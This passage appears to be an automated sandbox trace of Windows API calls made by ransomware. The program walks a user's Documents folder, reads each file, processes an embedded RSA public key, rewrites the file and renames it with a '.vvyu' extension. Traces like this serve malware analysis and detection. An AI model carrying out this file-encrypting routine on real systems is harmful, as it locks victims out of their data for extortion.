dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.095] GetCurrentThreadId () returned 0x66c [0196.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea4e70 [0196.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.096] GetCurrentThreadId () returned 0x66c [0196.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e10 [0196.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2db0 [0196.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2dc8 [0196.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d98 [0196.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e28 [0196.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0196.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2df8 [0196.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2de0 [0196.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e40 [0196.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2de0 [0196.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0196.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2db0 [0196.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0196.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0196.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0196.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0196.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0196.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0196.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea15c0 | out: hHeap=0x620000) returned 1 [0196.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.107] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x9d88, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x9d88, lpOverlapped=0x0) returned 1 [0196.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.108] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x9d8d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.108] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.109] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.109] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.110] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.110] CloseHandle (hObject=0x568) returned 1 [0196.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0196.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.112] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\8tIQYXue.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\8tiqyxue.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\8tIQYXue.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\8tiqyxue.odp.vvyu")) returned 1 [0196.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.129] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.132] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ff3ab40, ftCreationTime.dwHighDateTime=0x1d89b8a, ftLastAccessTime.dwLowDateTime=0xf1d84350, ftLastAccessTime.dwHighDateTime=0x1d8a2fc, ftLastWriteTime.dwLowDateTime=0xf1d84350, ftLastWriteTime.dwHighDateTime=0x1d8a2fc, nFileSizeHigh=0x0, nFileSizeLow=0x83b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bJu5IwGZcIVxDeaCzVA1.odt", cAlternateFileName="BJU5IW~1.ODT")) returned 1 [0196.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.133] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\bJu5IwGZcIVxDeaCzVA1.odt") returned=".odt" [0196.133] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\bJu5IwGZcIVxDeaCzVA1.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\bju5iwgzcivxdeaczva1.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.133] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=33720) returned 1 [0196.133] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.136] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x8392, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.136] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.142] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.142] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x83b8, lpOverlapped=0x0) returned 1 [0196.143] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.143] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.143] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.143] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0196.145] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.145] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.145] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.145] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.145] GetLastError () returned 0x0 [0196.145] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.145] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0196.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.145] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.145] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.145] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x83c0) returned 0x2ea79b0 [0196.146] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea15c0 [0196.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d80 [0196.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1608 [0196.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d98 [0196.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2dc8 [0196.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e28 [0196.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2de0 [0196.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.147] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e28 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2de0 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2dc8 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 